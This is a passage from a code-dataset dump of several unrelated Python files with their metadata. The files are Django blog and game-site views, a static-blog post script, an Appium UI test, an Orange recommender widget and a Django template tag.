"reuters_lstm_batch.py", "file_ext": "py", "file_size_in_byte": 9563, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "keras.callbacks.Callback", "line_number": 23, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pathlib.PurePath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.PurePath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 120, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 121, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 121, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 122, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 123, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 123, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 126, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 127, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 129, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 131, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 134, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 135, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 260, "usage_type": "call"}, {"api_name": "os.path", "line_number": 260, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 269, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 288, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 288, "usage_type": "name"}]} +{"seq_id": "243520356", "text": "from django.conf import settings\n\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\n\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.core.mail import send_mail\n\nfrom django.http import HttpResponse\n\nfrom artigos.models import Artigo\nfrom artigos.forms import FormContato\n\n\ndef index(request, pagina=1):\n\tpaginacao = Paginator(Artigo.objects.all(), 3)\n\ttry:\n\t\tresumo = paginacao.page(pagina)\n\texcept PageNotAnInteger:\n\t\t# se a pagina não for um número inteiro, pega a primeira\n\t\tresumo = paginacao.page(1)\n\texcept EmptyPage:\n\t\t# se a pagina estiver fora do limite, pega a ultima\n\t\tresumo = paginacao.page(paginacao.num_pages)\n\n\treturn render(request, 'index.html', {\n\t\t\t\t\t\t'artigos': resumo.object_list,\n\t\t\t\t\t\t'paginacao': resumo,\n\t\t\t\t\t\t'page_now': pagina,\n\t\t\t\t\t})\n\n\ndef artigo(request, url):\n\treturn render(request, 'detail.html', {\n\t\t\t'artigo': get_object_or_404(Artigo, url=url),\n\t\t\t'media_url': settings.MEDIA_URL\n\t\t})\n\n\ndef form_pequisa(request):\n\treturn render(request, 'search_form.html')\n\n\ndef pesquisa(request):\n\tif 'q' in request.GET and request.GET['q']:\n\t\tq = request.GET['q']\n\t\tartigos = Artigo.objects.filter(titulo__contains=q) | Artigo.objects.filter(conteudo__contains=q)\n\t\treturn render(request, 'search_results.html', {'artigos': artigos, 'query': q})\n\telse:\n\t\treturn render(request, 'search_form.html', {'erro': True})\n\n\ndef contato(request):\n\tif request.method == 'POST':\n\t\tform = FormContato(request.POST)\n\t\tif form.is_valid():\n\t\t\temail = ['leonardo.cintra@luizalabs.com']\n\t\t\tremetente = form.cleaned_data['email']\n\t\t\tassunto = 'CONTATO - ' + form.cleaned_data['nome']\n\t\t\tmensagem = 'Telefone: ' + form.cleaned_data['telefone'] + \"
\" + form.cleaned_data['mensagem']\n\t\t\tsend_mail(assunto, mensagem, remetente, email)\n\n\t\t\treturn render(request, 'contact.html', {'form': FormContato(), 'send': True})\n\telse:\n\t\tform = FormContato()\n\n\treturn render(request, 'contact.html', {'form': form})\n", "sub_path": "app2/artigos/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "artigos.models.Artigo", "line_number": 18, "usage_type": "name"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "artigos.models.Artigo", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "artigos.models", "line_number": 49, "usage_type": "name"}, {"api_name": "artigos.models.Artigo.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "artigos.models.Artigo", "line_number": 49, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "artigos.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 57, "usage_type": "call"}, {"api_name": "django.core.mail.send_mail", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 65, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "631319103", "text": "import json\nimport time\n\nimport os.path\nfrom xpinyin import Pinyin\n\nfrom common import file, console\nfrom manage import get\n\nsystem_info = json.loads(file.read_file(\"./config/system.json\"))\n\ndef get_name(name_input):\n p = Pinyin()\n name = name_input.replace(\" \", \"-\")\n name = get.filter_name(name)\n return p.get_pinyin(name)\n\ndef new_post_init(config, independent=False):\n title = config[\"title\"]\n name = get.filter_name(config[\"name\"])\n if not os.path.exists(\"./document/{}.md\".format(name)):\n editor = system_info[\"Editor\"]\n os.system(\"{0} ./document/{1}.md\".format(editor, name))\n post_info = {\"name\": name, \"title\": title, \"time\": time.time()}\n if not os.path.exists(\"./document/{}.md\".format(name)):\n console.log(\"Error\", \"Cannot find [./document/{}.md] file\".format(name))\n return\n if not independent:\n excerpt = get.get_excerpt(\"./document/{}.md\".format(name))\n post_info[\"excerpt\"] = excerpt\n\n write_json = post_info\n page_config = \"./document/{}.json\".format(name)\n\n if not independent:\n write_json = json.loads(file.read_file(\"./config/page.json\"))\n write_json.insert(0, post_info)\n page_config = \"./config/page.json\"\n\n file.write_file(page_config, json.dumps(write_json, indent=4, sort_keys=False, ensure_ascii=False))\n\n console.log(\"Success\", \"Create a new article successfully!\")\n", "sub_path": "manage/new_post.py", "file_name": "new_post.py", "file_ext": "py", "file_size_in_byte": 1401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 10, "usage_type": "call"}, {"api_name": "common.file.read_file", "line_number": 10, "usage_type": "call"}, {"api_name": "common.file", "line_number": 10, "usage_type": "name"}, {"api_name": "xpinyin.Pinyin", "line_number": 13, "usage_type": "call"}, {"api_name": "manage.get.filter_name", "line_number": 15, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 15, "usage_type": "name"}, {"api_name": "manage.get.filter_name", "line_number": 20, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "os.path.system", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "time.time", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "common.console.log", "line_number": 26, "usage_type": "call"}, {"api_name": "common.console", "line_number": 26, "usage_type": "name"}, {"api_name": "manage.get.get_excerpt", "line_number": 29, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 29, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "common.file.read_file", "line_number": 36, "usage_type": "call"}, {"api_name": "common.file", "line_number": 36, "usage_type": "name"}, {"api_name": "common.file.write_file", "line_number": 40, "usage_type": "call"}, {"api_name": "common.file", "line_number": 40, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "common.console.log", "line_number": 42, "usage_type": "call"}, {"api_name": "common.console", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "108778299", "text": "# -*- coding: utf-8 -*-\n# @Time : 2021/7/1 22:01\n# @Author : wkRonin\n# @File :test_luzhi.py\n# This sample code uses the Appium python client\n# pip install Appium-Python-Client\n# Then you can paste this into a file and simply run with Python\n# pip install appium-python-client\nimport time\n\nfrom appium import webdriver\n\ncaps = {}\ncaps[\"platformName\"] = \"Android\"\ncaps[\"appPackage\"] = \"com.tencent.wework\"\ncaps[\"appActivity\"] = \".launch.LaunchSplashActivity\"\ncaps[\"deviceName\"] = \"hogwarts\"\ncaps[\"noReset\"] = \"true\"\n# 至关重要的一行 与appium 服务建立连接,并传递一个caps 字典对象\ndriver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\ntime.sleep(5)\nel1 = driver.find_element_by_xpath(\"//*[@text='通讯录']\")\nel1.click()\ntime.sleep(3)\nel2 = driver.find_element_by_id(\"com.tencent.wework:id/hci\")\nel2.click()\ntime.sleep(3)\nel3 = driver.find_element_by_id(\"com.tencent.wework:id/g5f\")\nel3.send_keys(\"朱维康\")\nel4 = driver.find_element_by_id(\"com.tencent.wework:id/d_1\")\nel4.click()\n\n\ndriver.quit()\n", "sub_path": "test_appium/test_luzhi.py", "file_name": "test_luzhi.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "appium.webdriver.Remote", "line_number": 20, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "193169697", "text": "from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QApplication\n\nfrom Orange.data import Table\nfrom Orange.widgets import settings\nfrom Orange.widgets import gui\nfrom Orange.widgets.utils.owlearnerwidget import OWBaseLearner\n\nfrom orangecontrib.recommendation import BRISMFLearner\n\n\nclass OWBRISMF(OWBaseLearner):\n # Widget needs a name, or it is considered an abstract widget\n # and not shown in the menu.\n name = \"BRISMF\"\n description = 'Matrix factorization with explicit ratings, learning is ' \\\n 'performed by stochastic gradient descent.'\n icon = \"icons/brismf.svg\"\n priority = 80\n\n LEARNER = BRISMFLearner\n\n outputs = [(\"P\", Table),\n (\"Q\", Table)]\n\n num_factors = settings.Setting(5)\n num_iter = settings.Setting(25)\n learning_rate = settings.Setting(0.005)\n bias_learning_rate = settings.Setting(0.005)\n lmbda = settings.Setting(0.02)\n bias_lmbda = settings.Setting(0.02)\n\n def add_main_layout(self):\n box = gui.widgetBox(self.controlArea, \"Parameters\")\n self.base_estimator = BRISMFLearner()\n\n gui.spin(box, self, \"num_factors\", 1, 10000,\n label=\"Number of latent factors:\",\n alignment=Qt.AlignRight, callback=self.settings_changed)\n\n gui.spin(box, self, \"num_iter\", 1, 10000,\n label=\"Number of iterations:\",\n alignment=Qt.AlignRight, callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"learning_rate\", minv=1e-4, maxv=1e+5,\n step=1e-5, label=\"Learning rate:\", decimals=5,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"bias_learning_rate\", minv=1e-4, maxv=1e+5,\n step=1e-5, label=\"Learning rate:\", decimals=5,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"lmbda\", minv=1e-4, maxv=1e+4, step=1e-4,\n label=\"Regularization:\", decimals=4,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"bias_lmbda\", minv=1e-4, maxv=1e+4, step=1e-4,\n label=\"Bias regularization:\", decimals=4,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n def create_learner(self):\n return self.LEARNER(\n num_factors=self.num_factors,\n num_iter=self.num_iter,\n learning_rate=self.learning_rate,\n bias_learning_rate=self.bias_learning_rate,\n lmbda=self.lmbda,\n bias_lmbda=self.bias_lmbda\n )\n\n def get_learner_parameters(self):\n return ((\"Number of latent factors\", self.num_factors),\n (\"Number of iterations\", self.num_iter),\n (\"Learning rate\", self.learning_rate),\n (\"Bias learning rate\", self.bias_learning_rate),\n (\"Regularization\", self.lmbda),\n (\"Bias regularization\", self.bias_lmbda))\n\n\nif __name__ == '__main__':\n app = QApplication([])\n widget = OWBRISMF()\n widget.show()\n app.exec()", "sub_path": "orangecontrib/recommendation/widgets/owbrismf.py", "file_name": "owbrismf.py", "file_ext": "py", "file_size_in_byte": 3320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Orange.widgets.utils.owlearnerwidget.OWBaseLearner", "line_number": 12, "usage_type": "name"}, {"api_name": "orangecontrib.recommendation.BRISMFLearner", "line_number": 21, "usage_type": "name"}, {"api_name": "Orange.data.Table", "line_number": 23, "usage_type": "name"}, {"api_name": "Orange.data.Table", "line_number": 24, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 26, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 26, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 27, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 27, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 28, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 29, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 30, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 31, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.widgetBox", "line_number": 34, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 34, "usage_type": "name"}, {"api_name": "orangecontrib.recommendation.BRISMFLearner", "line_number": 35, "usage_type": "call"}, {"api_name": "Orange.widgets.gui.spin", "line_number": 37, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 39, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.spin", "line_number": 41, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 43, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 45, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 47, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 50, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 52, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 52, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 55, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 57, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 60, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "487143234", "text": "from django import template\nfrom django.db import models\nfrom django.template.loader import render_to_string\nfrom django.contrib.contenttypes.models import ContentType\n\n\nItem = models.get_model(\"djumblr\", \"tumbleitem\")\nregister = template.Library()\n\n\ndef tumblr_render(parser, token):\n bits = token.split_contents() \n if len(bits) < 2:\n raise template.TemplateSyntaxError(\"%r tag takes at least one argument\" % bits[0])\n\n item = bits[1]\n args = {}\n\n # Parse out extra clauses if given\n if len(bits) > 2:\n biter = iter(bits[2:])\n for bit in biter:\n if bit == \"using\":\n args[\"using\"] = biter.next()\n elif bit == \"as\":\n args[\"asvar\"] = biter.next()\n else:\n raise template.TemplateSyntaxError(\"%r tag got an unknown argument: %r\" % (bits[0], bit))\n\n return TumblrRenderNode(item, **args)\n\ntumblr_render = register.tag(tumblr_render)\n\n\nclass TumblrRenderNode(template.Node):\n def __init__(self, item, using=None, asvar=None):\n self.item = item\n self.using = using\n self.asvar = asvar\n\n def render(self, context):\n try:\n item = template.resolve_variable(self.item, context)\n except template.VariableDoesNotExist:\n return \"\"\n\n if isinstance(item, Item):\n object = item\n\n # If the item isn't an Item, try to look one up.\n else:\n object = item\n ct = ContentType.objects.get_for_model(item)\n try:\n item = Item.objects.get(content_type=ct, object_id=object._get_pk_val())\n except Item.DoesNotExist:\n return \"\"\n\n # Figure out which templates to use\n template_list = [\n \"djumblr/display/%s.html\" % item.content_type.name,\n \"djumblr/display/generic.html\"\n ]\n if self.using:\n try:\n using = template.resolve_variable(self.using, context)\n except template.VariableDoesNotExist:\n pass\n else:\n template_list.insert(0, using)\n\n # Render content, and save to self.asvar if requested\n context.push()\n context.update({\n \"item\" : item,\n \"object\" : object\n })\n rendered = render_to_string(template_list, context)\n context.pop()\n if self.asvar:\n context[self.asvar] = rendered\n return \"\"\n else:\n return rendered\n", "sub_path": "djumblr/templatetags/djumblr.py", "file_name": "djumblr.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.models.get_model", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.template.Library", "line_number": 8, "usage_type": "call"}, {"api_name": "django.template", "line_number": 8, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 14, "usage_type": "call"}, {"api_name": "django.template", "line_number": 14, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template", "line_number": 28, "usage_type": "name"}, {"api_name": "django.template.Node", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 35, "usage_type": "name"}, {"api_name": "django.template.resolve_variable", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template", "line_number": 43, "usage_type": "name"}, {"api_name": "django.template.VariableDoesNotExist", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects.get_for_model", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.template.resolve_variable", "line_number": 66, "usage_type": "call"}, {"api_name": "django.template", "line_number": 66, "usage_type": "name"}, {"api_name": "django.template.VariableDoesNotExist", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 67, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "482553583", "text": "from .models import Idea, Version, Player\nfrom .forms import IdeaForm, SignUpForm\nfrom .tokens import account_activation_token\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views import generic\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.auth import login, authenticate\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom .serializers import UserSerializer, GroupSerializer, IdeaSerializer, HistorySerializer\nfrom .permissions import IsOwnerOrReadOnly\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all() #.order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass IdeaViewSet(viewsets.ModelViewSet):\n # ver = Version.objects.all().order_by('-pub_date')[0]\n # queryset = Idea.objects.all().filter(version=ver).order_by('-pub_date')\n queryset = Idea.objects.all()\n lookup_field = 'id'\n serializer_class = IdeaSerializer\n permission_classes = (IsOwnerOrReadOnly,)\n\n def pre_save(self, obj):\n obj.owner = self.request.user\n\n\nclass OwnIdeasViewSet(viewsets.ModelViewSet):\n serializer_class = IdeaSerializer\n\n def get_queryset(self):\n return Idea.objects.filter(self.request.user)\n\n\nclass IdeasViewSet(viewsets.ModelViewSet):\n serializer_class = IdeaSerializer\n\n def get_queryset(self):\n ver = Version.objects.all().order_by('-id')[0]\n return Idea.objects.filter(version=ver)\n\n\nclass HistoryViewSet(viewsets.ModelViewSet):\n serializer_class = HistorySerializer\n\n def get_queryset(self):\n return Version.objects.all()\n\n\ndef homepage(request):\n return render(request, 'website/home.html')\n\n# class IndexTestView(generic.View):\n# template_name = 'website/indextest.html'\n#\n# def get(self, request, *args, **kwargs):\n# return render(request, 'website/home.html')\n\n\n\n\n# old views\nclass IndexView(generic.View):\n template_name = 'website/index.html'\n\n def get(self, request, *args, **kwargs):\n num_visits = request.session.get('num_visits', 0)\n request.session['num_visits'] = num_visits+1\n version = Version.objects.all().order_by('-id')[0]\n versionLabel = version.label\n\n return render(request, 'website/index.html', context={\n 'num_visits':num_visits, 'version':versionLabel}, # num_visits appended\n\n )\n\n\nclass HistoryView(generic.ListView):\n model = Version\n template_name = 'website/history.html'\n\n def get_queryset(self):\n return Version.objects.all().order_by('-pub_date')\n\n\nclass IdeasView(generic.ListView):\n template_name = 'website/ideas.html'\n model = Idea\n context_object_name = 'idea_list'\n\n def get_queryset(self):\n ver = Version.objects.all().order_by('-pub_date')[0]\n return Idea.objects.filter(version=ver).order_by('-pub_date')\n\n\nclass GameView(generic.View):\n template_name = 'website/game.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, 'website/game_alt.html')\n\n\nclass PhaserGameView(generic.View):\n template_name = 'website/phasergame.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, 'website/phasergame.html')\n\n\n# @login_required()\n# def idea_new(request):\n# form = IdeaForm()\n# return render(request, 'website/idea_form.html', {'form' : form})\n\n\n@login_required()\ndef idea_new(request):\n if request.method == \"POST\":\n form = IdeaForm(request.POST)\n player = Player.objects.all().filter(user=request.user)[0]\n requests_left = player.requests_left\n if requests_left < 1:\n #return redirect('/website/ideas', {'vote': 'You already submited a request!'})\n return render(request, 'website/ideas.html', {'vote': 'You already '\n 'submited a request this cycle!'})\n elif form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n ver = Version.objects.all().order_by('-id')[0]\n post.version = ver\n post.save()\n player.requests_left -= 1\n player.save()\n\n return redirect('ideas', pk=post.pk)\n else:\n form = IdeaForm()\n return render(request, 'website/idea_form.html', {'form': form})\n\n\nclass idea_detail(generic.DetailView):\n model = Idea\n template_name = 'website/idea.html'\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n try:\n user = form.save(commit=False)\n except Player.DoesNotExist:\n user = Player(user=request.user)\n # user.refresh_from_db()\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n subject = 'Activate your Crowdjump Account'\n newuid = force_text(urlsafe_base64_encode(force_bytes(user.pk)))\n message = render_to_string('website/account_activation_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n # 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'uid': newuid,\n 'token': account_activation_token.make_token(user),\n })\n user.email_user(subject, message)\n return redirect('website:account_activation_sent')\n else:\n form = SignUpForm()\n return render(request, 'website/signup.html', {'form': form}, RequestContext(request))\n\n\ndef account_activation_sent(request):\n return render(request, 'website/account_activation_sent.html')\n\n\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, Player.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.player.email_confirmed = True\n user.save()\n login(request, user)\n return redirect('website:index')\n else:\n return render(request, 'website/account_activation_invalid.html')\n\n", "sub_path": "website/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 19, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "serializers.UserSerializer", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", 